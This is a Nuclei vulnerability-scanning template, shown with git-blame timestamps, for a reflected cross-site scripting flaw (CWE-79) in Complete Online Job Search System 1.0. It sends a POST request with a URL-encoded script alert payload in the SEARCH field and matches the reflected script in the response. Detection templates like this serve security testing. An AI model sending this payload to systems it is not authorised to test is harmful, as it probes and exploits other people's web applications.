2022-07-18 12:44:09 +00:00
|
|
|
id: eris-xss
|
|
|
|
|
|
|
|
info:
|
2022-09-21 21:42:27 +00:00
|
|
|
name: Complete Online Job Search System 1.0 - Cross-Site Scripting
|
2022-07-18 12:44:09 +00:00
|
|
|
author: arafatansari
|
2022-09-21 21:42:27 +00:00
|
|
|
severity: high
|
2022-07-18 12:44:09 +00:00
|
|
|
description: |
|
2022-09-21 21:42:27 +00:00
|
|
|
Complete Online Job Search System 1.0 contains a cross-site scripting vulnerability via index.php?q=advancesearch.
|
|
|
|
reference:
|
|
|
|
- https://github.com/debug601/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-9.md
|
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 7.2
|
|
|
|
cwe-id: CWE-79
|
2022-07-19 08:55:14 +00:00
|
|
|
metadata:
|
|
|
|
verified: true
|
2023-10-14 11:27:55 +00:00
|
|
|
max-request: 1
|
2024-01-14 09:21:50 +00:00
|
|
|
tags: cve,cve2022,xss,eris,sqli
|
2022-07-18 12:44:09 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-07-18 12:44:09 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /index.php?q=result&searchfor=advancesearch HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
2022-07-19 08:55:14 +00:00
|
|
|
|
|
|
|
SEARCH=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&COMPANY=&CATEGORY=&submit=Submit
|
2022-07-18 12:44:09 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
2022-07-19 08:55:14 +00:00
|
|
|
- 'Result : <script>alert(document.domain)</script>'
|
|
|
|
- 'ERIS'
|
|
|
|
condition: and
|
2022-07-18 12:44:09 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-01-26 08:31:11 +00:00
|
|
|
# digest: 4a0a00473045022100b80ce45561377f428182b10620459eaec330de78d74f2de8066cfcc1e2853d4902204e29ff6dfdf8d779af2f9ed31886cf5f572f350388268e216a00ae49b724dc81:922c64590222798bb761d5b6d8e72950
|